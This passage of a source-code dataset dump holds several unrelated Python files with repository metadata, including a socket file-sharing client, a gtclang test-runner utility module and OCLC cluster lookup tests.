SendPayload(socketObject, " ".join(commandArgs))
# Receiving List of Strings
listOutput = ""
reachedEOF = False
while not reachedEOF:
# Receiving data in 1 KB chunks
data = RecvPayload(socketObject)
# Check of the data is a signifier of the end of transmission
responseCode = 0
try:
responseCode = int(data)
except:
responseCode = 0
if(not data or data == "" or responseCode == 205):
reachedEOF = True
break
# Not the end of the transmission
listOutput += data
# Send confirmation that we received, back to the server
SendPayload(socketObject, "201")
print(listOutput)
return
def Search(commandArgs):
List(commandArgs)
# Send our available files to the central server
def RefreshServer(commandArgs=[]):
# If this is the initial connection, we don't need to inform the Server we're sending files, as it's already expecting them
if(commandArgs):
SendPayload(socketObject, " ".join(commandArgs))
print("\nPlease give descriptions for all files in the current directory, one file at a time")
# Gather descriptions for each file we have, and tell the server about them
for fileFound in os.listdir("."):
responseCode = 0
# Keep looping as long as the server hasn't confirmed this file
while(responseCode != 201):
# Ask user for file description
descriptionPrompt = ""
if(responseCode == 301):
descriptionPrompt = "".join(["Something went wrong on the server. Please try again.\n", "Description [", fileFound, "]: "])
else:
descriptionPrompt = "".join(["Description [", fileFound, "]: "])
fileDescription = input(descriptionPrompt)
payload = "|".join([fileFound, fileDescription])
# Send that info to the server
SendPayload(socketObject, payload)
# Wait for servers acceptance code (success or failure)
response = RecvPayload(socketObject)
try:
responseCode = int(response)
except:
print("Errored out with response/Code:", response)
# Tell the server we're done
SendPayload(socketObject, "205")
# Ask server to retrieve a requested file
def Retrieve(commandArgs):
global socketObject
global bufferSize
SendPayload(socketObject, " ".join(commandArgs))
# First listen for status code
statusCode = "300"
statusCode = RecvPayload(socketObject)
if(int(statusCode) == 300):
print("File does not exist")
return
if(int(statusCode) != 200):
print("Error in downloading file")
return
# Prepping a fileStream for us to write into
try:
receivedFile = open(commandArgs[1], 'wb')
except:
print("Error in downloading file")
return
# Reading the file in from the server
reachedEOF = False
while not reachedEOF:
print('Downloading file from server...')
# Receiving data in 1 KB chunks
data = socketObject.recv(bufferSize)
if(not data):
reachedEOF = True
break
# If there was no data in the latest chunk, then break out of our loop
decodedString = data.decode("UTF-8")
if(len(decodedString) >= 2 and decodedString[len(decodedString) - 1: len(decodedString)] == "\0"):
reachedEOF = True
decodedString = decodedString[0: len(decodedString) - 1]
# Write data to a file
receivedFile.write(data)
receivedFile.close()
print("Successfully downloaded and saved: ", commandArgs[1])
return
# Send a requested file
def Store(commandArgs):
global socketObject
global bufferSize
# Sending status code for if the file exists
fileName = commandArgs[1]
try:
fileItself = open(fileName, "rb")
except:
print("Failed to open file: ", fileName)
return
# command = " "
# socketObject.send(command.join(commandArgs).encode("UTF-8"))
SendPayload(socketObject, " ".join(commandArgs))
# Breaking the file down into smaller data chunks
fileInBytes = fileItself.read(bufferSize)
while fileInBytes:
socketObject.send(fileInBytes)
# Reading in the next chunk of data
fileInBytes = fileItself.read(bufferSize)
fileItself.close()
print("Sent: ", commandArgs[1])
# Let the client know we're done sending the file
SendPayload(socketObject, "205")
return
# Shutdown the server
def Shutdown_Server(commandArgs):
global socketObject
SendPayload(socketObject, " ".join(commandArgs))
return
def Main():
global connected
print("Would you like to operate with command line or GUI?")
print(" - [0] Command Line")
print(" - [1] GUI")
userResponse = input("Interface: ")
if(userResponse == "0"):
print("\nYou have selected Command Line")
else:
print("\nLaunching GUI")
print("\nYou must first connect to a server before issuing any commands.")
while userResponse == "0":
print("\n-----------------------------\n")
userInput = input("Enter Command: ")
commandArgs = userInput.split()
commandGiven = commandArgs[0]
if(commandGiven.upper() == "CONNECT" and len(commandArgs) == 3):
if connected:
Disconnect(commandArgs)
Connect(commandArgs[1], commandArgs[2])
if(connected):
RefreshServer()
print("\nReady to interact with Server")
else:
Connect(commandArgs[1], commandArgs[2])
if(connected):
RefreshServer()
print("\nReady to interact with Server")
continue
else:
if not connected:
print("You must first connect to a server before issuing any commands.")
continue
if(commandGiven.upper() == "REFRESH_USER_FILES" and len(commandArgs) == 1):
RefreshServer(commandArgs)
continue
elif(commandGiven.upper() == "LIST" and len(commandArgs) == 1):
List(commandArgs)
continue
elif(commandGiven.upper() == "SEARCH" and len(commandArgs) == 2):
List(commandArgs)
continue
elif(commandGiven.upper() == "RETRIEVE" and len(commandArgs) == 2):
Retrieve(commandArgs)
continue
elif(commandGiven.upper() == "STORE" and len(commandArgs) == 2):
Store(commandArgs)
continue
elif(commandGiven.upper() == "DISCONNECT" and len(commandArgs) == 1):
Disconnect(commandArgs)
continue
elif(commandGiven.upper() == "QUIT" and len(commandArgs) == 1):
Disconnect(commandArgs)
break
elif(commandGiven.upper() == "SHUTDOWN_SERVER" and len(commandArgs) == 1):
Disconnect(commandArgs)
break
else:
print("Invalid Command. Please try again.")
continue
Main() | 33.859008 | 140 | 0.589297 | 1,279 | 12,968 | 5.971853 | 0.246286 | 0.039146 | 0.020031 | 0.029851 | 0.298246 | 0.249673 | 0.20686 | 0.191673 | 0.191673 | 0.140875 | 0 | 0.012017 | 0.319787 | 12,968 | 383 | 141 | 33.859008 | 0.853871 | 0.154688 | 0 | 0.526316 | 0 | 0 | 0.127529 | 0.003273 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045113 | false | 0 | 0.018797 | 0 | 0.105263 | 0.116541 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5eaa3697b5bd970332387efa36b0b10e0887039a | 2,767 | py | Python | app-tasks/rf/src/rf/ingest/models/layer.py | radiantearth/raster-foundry | 834dc0a1cd4247ffa065ea16fa92760df908760e | [
"Apache-2.0"
] | null | null | null | app-tasks/rf/src/rf/ingest/models/layer.py | radiantearth/raster-foundry | 834dc0a1cd4247ffa065ea16fa92760df908760e | [
"Apache-2.0"
] | 1 | 2017-08-23T17:10:19.000Z | 2017-08-23T21:57:17.000Z | app-tasks/rf/src/rf/ingest/models/layer.py | radiantearth/raster-foundry | 834dc0a1cd4247ffa065ea16fa92760df908760e | [
"Apache-2.0"
] | 3 | 2020-02-05T13:26:31.000Z | 2021-07-24T15:02:02.000Z | """ Python class to represent a layer within an ingest """
class Layer(object):
"""Construct layer to ingest"""
def __init__(self, id, output_uri, sources, cell_size, crs="epsg:3857", pyramid=True, native=False,
cell_type="uint16raw", histogram_buckets=512, tile_size=256,
resample_method="NearestNeighbor", key_index_method="ZCurveKeyIndexMethod",
ingest_resolution_meters=None):
"""
Create a new ingest Layer
Args:
id (str): scene id layer is based on
output_uri (str): Output layer URI
sources (list[dict]): list of sources that comprise layer
cell_size (dict): height and width of cells in layer
crs (str): Output layer CRS
pyramid (bool): Whether or not to pyramid
native (bool): Whether or not to save native resolution
cell_type (bool): Output layer cell-type
histogram_buckets (int): Output histogram bin count
tile_size (int): Size of output tiles
resample_method (str): GeoTrellis resample method
key_index_method (str): GeoTrellis method for indexing keys
ingest_resolution_meters (float): Optional resolution that will dictate which images
from the scene are used
"""
self.id = id
self.sources = sources
self.output_uri = output_uri
self.cell_size = cell_size
self.tile_size = tile_size
self.crs = crs
self.output_pyramid = pyramid
self.output_native = native
self.output_cell_type = cell_type
self.output_histogram_buckets = histogram_buckets
self.output_tile_size = tile_size
self.output_resample_method = resample_method
self.output_key_index_method = key_index_method
self.ingest_resolution_meters = ingest_resolution_meters
def to_dict(self):
""" Return a dict formatted specifically for serialization to an ingest definition component """
return {
'id': self.id,
'output': {
'uri': self.output_uri,
'crs': self.crs,
'cellType': self.output_cell_type,
'tileSize': self.tile_size,
'resampleMethod': self.output_resample_method,
'keyIndexMethod': self.output_key_index_method,
'histogramBuckets': self.output_histogram_buckets,
'cell_size': self.cell_size,
'pyramid': self.output_pyramid,
'native': self.output_native
},
'sources': [s.to_dict() for s in self.sources]
}
| 42.569231 | 104 | 0.597398 | 310 | 2,767 | 5.106452 | 0.309677 | 0.094757 | 0.04422 | 0.018951 | 0.078332 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006455 | 0.328153 | 2,767 | 64 | 105 | 43.234375 | 0.845078 | 0.331767 | 0 | 0 | 0 | 0 | 0.096118 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5eaa5b05829f7dff5f8b3654295d561566cbd3dd | 861 | py | Python | Jaccorot/0014/0014.py | saurabh896/python-1 | f8d3aedf4c0fe6e24dfa3269ea7e642c9f7dd9b7 | [
"MIT"
] | 3,976 | 2015-01-01T15:49:39.000Z | 2022-03-31T03:47:56.000Z | Jaccorot/0014/0014.py | dwh65416396/python | 1a7e3edd1cd3422cc0eaa55471a0b42e004a9a1a | [
"MIT"
] | 97 | 2015-01-11T02:59:46.000Z | 2022-03-16T14:01:56.000Z | Jaccorot/0014/0014.py | dwh65416396/python | 1a7e3edd1cd3422cc0eaa55471a0b42e004a9a1a | [
"MIT"
] | 3,533 | 2015-01-01T06:19:30.000Z | 2022-03-28T13:14:54.000Z | #!/usr/bin/python
# coding=utf-8
"""
第 0014 题: 纯文本文件 student.txt为学生信息, 里面的内容(包括花括号)如下所示,
请将上述内容写到 student.xls 文件中,如下图所示:
"""
import os
import json
import xlwt
def read_txt(path):
with open(path, 'r') as f:
text = f.read().decode('utf-8')
text_json = json.loads(text)
return text_json
def save_into_excel(content_dict, excel_name):
wb = xlwt.Workbook()
ws = wb.add_sheet("student", cell_overwrite_ok=True)
row = 0
col = 0
for k, v in sorted(content_dict.items(),key=lambda d:d[0]):
ws.write(row, col, k)
for i in v:
col += 1
ws.write(row, col, i)
row += 1
col = 0
wb.save(excel_name)
if __name__ == "__main__":
read_content = read_txt(os.path.join(os.path.split(__file__)[0], 'student.txt'))
save_into_excel(read_content, 'student.xls')
| 20.023256 | 84 | 0.610918 | 135 | 861 | 3.681481 | 0.525926 | 0.016097 | 0.052314 | 0.052314 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020031 | 0.246225 | 861 | 42 | 85 | 20.5 | 0.745763 | 0.131243 | 0 | 0.083333 | 0 | 0 | 0.058345 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.125 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5eac70af14d5975d4ffe25c63c27d1c08dbcf096 | 8,247 | py | Python | test/utils/gtclang-tester/gtclang_tester/utility.py | mroethlin/gtclang | 248b3637e3a438adc3bed3a684cee94798afff0b | [
"MIT"
] | 6 | 2017-10-10T18:56:54.000Z | 2020-05-28T15:29:19.000Z | test/utils/gtclang-tester/gtclang_tester/utility.py | twicki/gtclang | e87a7aa8612aad0df8c24117b9bbff6f8153a7fd | [
"MIT"
] | 125 | 2017-10-18T14:33:57.000Z | 2019-10-18T10:45:17.000Z | test/utils/gtclang-tester/gtclang_tester/utility.py | twicki/gtclang | e87a7aa8612aad0df8c24117b9bbff6f8153a7fd | [
"MIT"
] | 9 | 2017-09-20T12:57:49.000Z | 2019-08-26T09:32:20.000Z | #!/usr/bin/python3
# -*- coding: utf-8 -*-
##===-----------------------------------------------------------------------------*- Python -*-===##
## _ _
## | | | |
## __ _| |_ ___| | __ _ _ __ __ _
## / _` | __/ __| |/ _` | '_ \ / _` |
## | (_| | || (__| | (_| | | | | (_| |
## \__, |\__\___|_|\__,_|_| |_|\__, | - GridTools Clang DSL
## __/ | __/ |
## |___/ |___/
##
##
## This file is distributed under the MIT License (MIT).
## See LICENSE.txt for details.
##
##===------------------------------------------------------------------------------------------===##
##
## Several system related utility functions.
##
## Source: https://github.com/llvm-mirror/llvm/blob/master/utils/lit/lit/util.py with modification
## by Fabian Thuering
##
##===------------------------------------------------------------------------------------------===##
import os
import platform
import signal
import subprocess
import threading
import time
def to_bytes(str):
# Encode to UTF-8 to get binary data.
return str.encode('utf-8')
def to_string(bytes):
if isinstance(bytes, str):
return bytes
return to_bytes(bytes)
def convert_string(bytes):
try:
return to_string(bytes.decode('utf-8'))
except AttributeError: # 'str' object has no attribute 'decode'.
return str(bytes)
except UnicodeError:
return str(bytes)
def levenshtein(source, target):
""" From Wikipedia article; Iterative with two matrix rows. """
if source == target:
return 0
elif len(source) == 0:
return len(target)
elif len(target) == 0:
return len(source)
v0 = [None] * (len(target) + 1)
v1 = [None] * (len(target) + 1)
for i in range(len(v0)):
v0[i] = i
for i in range(len(source)):
v1[0] = i + 1
for j in range(len(target)):
cost = 0 if source[i] == target[j] else 1
v1[j + 1] = min(v1[j] + 1, v0[j + 1] + 1, v0[j] + cost)
for j in range(len(v0)):
v0[j] = v1[j]
return v1[len(target)]
def detectCPUs():
"""
Detects the number of CPUs on a system. Cribbed from pp.
"""
# Linux, Unix and MacOS:
if hasattr(os, "sysconf"):
if "SC_NPROCESSORS_ONLN" in os.sysconf_names:
# Linux & Unix:
ncpus = os.sysconf("SC_NPROCESSORS_ONLN")
if isinstance(ncpus, int) and ncpus > 0:
return ncpus
else: # OSX:
return int(capture(['sysctl', '-n', 'hw.ncpu']))
# Windows:
if "NUMBER_OF_PROCESSORS" in os.environ:
ncpus = int(os.environ["NUMBER_OF_PROCESSORS"])
if ncpus > 0:
# With more than 32 processes, process creation often fails with
# "Too many open files". FIXME: Check if there's a better fix.
return min(ncpus, 32)
return 1 # Default
def capture(args, env=None):
"""capture(command) - Run the given command (or argv list) in a shell and
return the standard output. Raises a CalledProcessError if the command
exits with a non-zero status."""
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
out = convert_string(out)
err = convert_string(err)
if p.returncode != 0:
raise subprocess.CalledProcessError(cmd=args,
returncode=p.returncode,
output="{}\n{}".format(out, err))
return out
class ExecuteCommandTimeoutException(Exception):
def __init__(self, msg, out, err, exitCode):
assert isinstance(msg, str)
assert isinstance(out, str)
assert isinstance(err, str)
assert isinstance(exitCode, int)
self.msg = msg
self.out = out
self.err = err
self.exitCode = exitCode
# Close extra file handles on UNIX (on Windows this cannot be done while
# also redirecting input).
kUseCloseFDs = not (platform.system() == 'Windows')
def asyncExecuteCommand(commands, cwds, env=None):
running_procs = [(subprocess.Popen(command, cwd=cwd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env, close_fds=kUseCloseFDs), idx) for command, cwd, idx
in zip(commands, cwds, range(0, len(commands)))]
print(running_procs)
results = len(commands) * [None]
while running_procs:
for proc, idx in running_procs:
print(proc, idx)
retcode = proc.poll()
if retcode is not None: # Process finished.
out, err = proc.communicate()
results[idx] = (out, err, retcode)
running_procs.remove((proc, idx))
break
else: # No process is done, wait a bit and check again.
time.sleep(.1)
continue
return results
def executeCommand(command, cwd=None, env=None, input=None, timeout=0):
"""
Execute command ``command`` (list of arguments or string)
with
* working directory ``cwd`` (str), use None to use the current
working directory
* environment ``env`` (dict), use None for none
* Input to the command ``input`` (str), use string to pass
no input.
* Max execution time ``timeout`` (int) seconds. Use 0 for no timeout.
Returns a tuple (out, err, exitCode) where
* ``out`` (str) is the standard output of running the command
* ``err`` (str) is the standard error of running the command
* ``exitCode`` (int) is the exitCode of running the command
If the timeout is hit an ``ExecuteCommandTimeoutException``
is raised.
"""
p = subprocess.Popen(command, cwd=cwd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env, close_fds=kUseCloseFDs)
timerObject = None
hitTimeOut = [False]
try:
if timeout > 0:
def killProcess():
# We may be invoking a shell so we need to kill the
# process and all its children.
hitTimeOut[0] = True
killProcessAndChildren(p.pid)
timerObject = threading.Timer(timeout, killProcess)
timerObject.start()
out, err = p.communicate(input=input)
exitCode = p.wait()
finally:
if timerObject != None:
timerObject.cancel()
# Ensure the resulting output is always of string type.
out = convert_string(out)
err = convert_string(err)
if hitTimeOut[0]:
raise ExecuteCommandTimeoutException(
msg='Reached timeout of {} seconds'.format(timeout),
out=out,
err=err,
exitCode=exitCode
)
# Detect Ctrl-C in subprocess.
if exitCode == -signal.SIGINT:
raise KeyboardInterrupt
return out, err, exitCode
def killProcessAndChildren(pid):
"""
This function kills a process with ``pid`` and all its
running children (recursively). It is currently implemented
using the psutil module which provides a simple platform
neutral implementation.
"""
import psutil
try:
psutilProc = psutil.Process(pid)
# Handle the different psutil API versions
try:
# psutil >= 2.x
children_iterator = psutilProc.children(recursive=True)
except AttributeError:
# psutil 1.x
children_iterator = psutilProc.get_children(recursive=True)
for child in children_iterator:
try:
child.kill()
except psutil.NoSuchProcess:
pass
psutilProc.kill()
except psutil.NoSuchProcess:
pass
| 33.388664 | 100 | 0.532921 | 877 | 8,247 | 4.90992 | 0.334094 | 0.015327 | 0.009289 | 0.018114 | 0.111937 | 0.081746 | 0.081746 | 0.081746 | 0.071064 | 0.052485 | 0 | 0.008723 | 0.332727 | 8,247 | 246 | 101 | 33.52439 | 0.77376 | 0.337456 | 0 | 0.174825 | 0 | 0 | 0.029186 | 0 | 0 | 0 | 0 | 0.004065 | 0.027972 | 1 | 0.076923 | false | 0.013986 | 0.048951 | 0.006993 | 0.251748 | 0.013986 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5eb21f50c3a708d9eb64cb1111bacf94011dc947 | 554 | py | Python | src/meshcat/tests/test_start_server.py | Arpafaucon/meshcat-python | c3a9ceaa2b82ba1146b174d901a63269a9b5432f | [
"MIT"
] | 150 | 2018-02-25T23:38:05.000Z | 2022-03-11T11:56:20.000Z | src/meshcat/tests/test_start_server.py | Arpafaucon/meshcat-python | c3a9ceaa2b82ba1146b174d901a63269a9b5432f | [
"MIT"
] | 104 | 2018-02-23T22:16:24.000Z | 2022-03-23T13:22:26.000Z | src/meshcat/tests/test_start_server.py | Arpafaucon/meshcat-python | c3a9ceaa2b82ba1146b174d901a63269a9b5432f | [
"MIT"
] | 45 | 2018-03-15T20:13:28.000Z | 2022-02-15T09:12:44.000Z | import unittest
from meshcat.servers.zmqserver import start_zmq_server_as_subprocess
class TestStartZmqServer(unittest.TestCase):
"""
Test the StartZmqServerAsSubprocess method.
"""
def test_default_args(self):
proc, zmq_url, web_url = start_zmq_server_as_subprocess()
self.assertIn("127.0.0.1", web_url)
def test_ngrok(self):
proc, zmq_url, web_url = start_zmq_server_as_subprocess( server_args=["--ngrok_http_tunnel"])
self.assertIsNotNone(web_url)
self.assertNotIn("127.0.0.1", web_url)
| 30.777778 | 101 | 0.720217 | 74 | 554 | 5.054054 | 0.459459 | 0.080214 | 0.112299 | 0.128342 | 0.379679 | 0.31016 | 0.245989 | 0.245989 | 0.245989 | 0.245989 | 0 | 0.026316 | 0.176895 | 554 | 17 | 102 | 32.588235 | 0.79386 | 0.077617 | 0 | 0 | 0 | 0 | 0.074747 | 0 | 0 | 0 | 0 | 0 | 0.3 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5eb5ea4f079264cee855d8779563ead4bcecdf9b | 702 | py | Python | sandbox/play_options.py | MiroK/mbed | d4c47151131c9e3502bec344218c7fd112044dce | [
"MIT"
] | 2 | 2017-07-07T11:13:11.000Z | 2019-01-03T17:58:28.000Z | sandbox/play_options.py | MiroK/Mbed | d4c47151131c9e3502bec344218c7fd112044dce | [
"MIT"
] | null | null | null | sandbox/play_options.py | MiroK/Mbed | d4c47151131c9e3502bec344218c7fd112044dce | [
"MIT"
] | null | null | null | from mbed.generation import make_line_mesh
from mbed.meshing import embed_mesh1d
import numpy as np
import sys
coords = np.array([[0, 0], [1, 0], [1, 1], [0, 1.]])
mesh1d = make_line_mesh(coords, close_path=True)
embed_mesh1d(mesh1d,
bounding_shape=0.1,
how='as_lines',
gmsh_args=sys.argv,
save_geo='model',
save_msh='model',
save_embedding='test_embed_line')
print()
embed_mesh1d(mesh1d,
bounding_shape=0.1,
how='as_points',
gmsh_args=sys.argv,
save_geo='model',
save_msh='model',
niters=2,
save_embedding='test_embed_point')
| 24.206897 | 52 | 0.57265 | 91 | 702 | 4.153846 | 0.428571 | 0.026455 | 0.063492 | 0.132275 | 0.402116 | 0.402116 | 0.402116 | 0.402116 | 0.402116 | 0.206349 | 0 | 0.039337 | 0.311966 | 702 | 28 | 53 | 25.071429 | 0.743271 | 0 | 0 | 0.454545 | 0 | 0 | 0.097004 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ec075408ba7dc145746d172546ed75b28e26a20 | 1,015 | py | Python | policy_loader.py | donghun2018/adclick-simulator | 2fc8a939a1d44865cf5a391a3d672ca47e45a058 | [
"MIT"
] | 2 | 2020-11-18T03:37:27.000Z | 2021-06-19T03:51:56.000Z | policy_loader.py | donghun2018/adclick-simulator | 2fc8a939a1d44865cf5a391a3d672ca47e45a058 | [
"MIT"
] | null | null | null | policy_loader.py | donghun2018/adclick-simulator | 2fc8a939a1d44865cf5a391a3d672ca47e45a058 | [
"MIT"
] | null | null | null | """
Loads policies by
1. load the list of PUID from "puid_list.csv"
2. load "Policy_<PUID>" class that is defined in ./Policies/<PUID>.py
by Donghun Lee 2018
"""
import csv
from importlib import import_module
def get_pols():
puids = get_puids()
mod_names = ["Policies" + "." + puid for puid in puids]
pol_names = ["Policy_" + puid for puid in puids]
mods = list(map(import_module, mod_names))
pol_ptr = [getattr(mod, pol) for mod, pol in zip(mods, pol_names)]
return pol_ptr
def get_puids():
with open("puid_list.csv") as ifh:
reader = csv.reader(ifh)
puids = [fn[0] for fn in reader]
return puids
if __name__ == "__main__":
# this is how you can use the policy loader in other files -- DH
#from policy_loader import get_pols
pols = get_pols()
for pol in pols:
policy = pol()
print("policy name = " + policy.id())
print("policy_bidspace = " + str(policy.bid_space))
print("a sample bid : " + str(policy.bid()))
| 26.710526 | 70 | 0.637438 | 154 | 1,015 | 4.019481 | 0.428571 | 0.033926 | 0.035541 | 0.042003 | 0.058158 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009103 | 0.242365 | 1,015 | 37 | 71 | 27.432432 | 0.795839 | 0.248276 | 0 | 0 | 0 | 0 | 0.111406 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.142857 | 0 | 0.333333 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ec654e8773eaea1ffae8ab9316677812ce2b191 | 11,998 | py | Python | cid-minting/tests/test_oclc_lookup.py | cdlib/zephir-services | 87597190302114aea7d3ae694181eeaffa9d63fc | [
"BSD-3-Clause"
] | 1 | 2018-11-15T21:33:32.000Z | 2018-11-15T21:33:32.000Z | cid-minting/tests/test_oclc_lookup.py | cdlib/zephir-services | 87597190302114aea7d3ae694181eeaffa9d63fc | [
"BSD-3-Clause"
] | 17 | 2018-11-30T19:43:56.000Z | 2021-12-08T00:45:18.000Z | cid-minting/tests/test_oclc_lookup.py | cdlib/zephir-services | 87597190302114aea7d3ae694181eeaffa9d63fc | [
"BSD-3-Clause"
] | 2 | 2018-11-30T19:29:48.000Z | 2019-01-29T23:24:23.000Z | import os
import msgpack
import pytest
import plyvel
from click.testing import CliRunner
from oclc_lookup import get_primary_ocn
from oclc_lookup import get_ocns_cluster_by_primary_ocn
from oclc_lookup import get_ocns_cluster_by_ocn
from oclc_lookup import get_clusters_by_ocns
from oclc_lookup import convert_set_to_list
from oclc_lookup import lookup_ocns_from_oclc
from oclc_lookup import main
# TESTS
def test_get_primary_ocn(setup):
primary_db_path = setup["primary_db_path"]
cluster_db_path = setup["cluster_db_path"]
input = list(setup["dfs"]["primary.csv"]["ocn"])
expect = list(setup["dfs"]["primary.csv"]["primary"])
result = [
get_primary_ocn(ocn, primary_db_path)
for ocn in input
]
assert sorted(expect) == sorted(result)
def test_get_primary_ocn_with_null_cases(setup):
primary_db_path = setup["primary_db_path"]
cluster_db_path = setup["cluster_db_path"]
# case: ocn passed is None
result = get_primary_ocn(None, primary_db_path)
assert result == None
# case: ocn not in the database
result = get_primary_ocn(0, primary_db_path)
assert result == None
def test_get_ocns_cluster_by_primary_ocn(setup):
primary_db_path = setup["primary_db_path"]
cluster_db_path = setup["cluster_db_path"]
primary_ocn = 1
cluster = [9987701, 53095235, 433981287, 6567842]
result = get_ocns_cluster_by_primary_ocn(primary_ocn, cluster_db_path)
assert sorted(cluster) == sorted(result)
def test_get_cluster_missing_primary(setup):
primary_db_path = setup["primary_db_path"]
cluster_db_path = setup["cluster_db_path"]
primary_ocn = 1
result = get_ocns_cluster_by_primary_ocn(primary_ocn, cluster_db_path)
assert primary_ocn not in result
def test_get_ocns_cluster_by_primary_ocn_2(setup):
primary_db_path = setup["primary_db_path"]
cluster_db_path = setup["cluster_db_path"]
primary_ocn = 17216714
cluster = [535434196]
result = get_ocns_cluster_by_primary_ocn(primary_ocn, cluster_db_path)
assert sorted(cluster) == sorted(result)
def test_get_cluster_ocn_with_null_cases(setup):
primary_db_path = setup["primary_db_path"]
cluster_db_path = setup["cluster_db_path"]
null_cases = {
"cluster_of_one_ocn": 1000000000,
"secondary_ocn": 6567842,
"invalid_ocn": 1234567890,
"none_ocn": None,
}
for k,v in null_cases.items():
assert None == get_ocns_cluster_by_primary_ocn(v, cluster_db_path)
def test_get_ocns_cluster_by_ocn(setup):
primary_db_path = setup["primary_db_path"]
cluster_db_path = setup["cluster_db_path"]
clusters = {
# ocn: list of all ocns of the cluster
1000000000: [1000000000], # cluster_of_one_ocn
1: [6567842, 9987701, 53095235, 433981287, 1], # cluster_of_multi_ocns_by_primary_ocn
6567842: [1, 6567842, 9987701, 53095235, 433981287], # cluster_of_multi_ocns_by_other_ocn
17216714: [17216714, 535434196], # cluster_of_2_ocns_by_primary_ocn,
}
for ocn, cluster in clusters.items():
result = get_ocns_cluster_by_ocn(ocn, primary_db_path, cluster_db_path)
assert sorted(cluster) == sorted(result)
def test_get_ocns_cluster_by_ocn_with_null_cases(setup):
primary_db_path = setup["primary_db_path"]
cluster_db_path = setup["cluster_db_path"]
null_cases = {
"invalid_ocn": 1234567890,
"none_ocn": None,
}
for k, v in null_cases.items():
assert None == get_ocns_cluster_by_ocn(v, primary_db_path, cluster_db_path)
def test_get_ocns_cluster_by_ocns(setup):
primary_db_path = setup["primary_db_path"]
cluster_db_path = setup["cluster_db_path"]
clusters = {
# primary_ocn, list of all ocns of the cluster
1000000000: [1000000000], # cluster_of_one_ocn
1: [6567842, 9987701, 53095235, 433981287, 1], # cluster_of_multi_ocns
17216714: [17216714, 535434196], # cluster_of_2_ocns,
}
sets = {
1000000000: {(1000000000,)},
1: {(1, 6567842, 9987701, 53095235, 433981287)},
17216714: {(17216714, 535434196)},
}
input_ocns_list = {
"1_one_primary_ocn_cluster_of_one": [1000000000],
"2_one_other_ocn_cluster_of_multi": [6567842],
"3_two_primary_ocns_dups": [1000000000, 1000000000],
"4_two_primary_ocns": [1, 1000000000],
"5_ocns_with_primary_secondary_dups_invalid": [1, 1, 6567842, 17216714, 535434196, 12345678901, 1000000000],
}
expected_set = {
"1_one_primary_ocn_cluster_of_one": sets[1000000000],
"2_one_other_ocn_cluster_of_multi": sets[1],
"3_two_primary_ocns_dups": sets[1000000000],
"4_two_primary_ocns": (sets[1] | sets[1000000000]),
"5_ocns_with_primary_secondary_dups_invalid": (sets[1] | sets[17216714] | sets[1000000000]),
}
for k, ocns in input_ocns_list.items():
result = get_clusters_by_ocns(ocns, primary_db_path, cluster_db_path)
print(result)
assert result != None
assert result == expected_set[k]
def test_get_ocns_cluster_by_ocns_wthnull_cases(setup):
primary_db_path = setup["primary_db_path"]
cluster_db_path = setup["cluster_db_path"]
input_ocns_list = {
"one_invalid_ocn": [1234567890],
"two_invalid_ocns": [1234567890, 12345678901],
"no_ocns": [],
}
for k, ocns in input_ocns_list.items():
result = get_clusters_by_ocns(ocns, primary_db_path, cluster_db_path)
assert result == set()
def test_convert_set_to_list():
input_sets = {
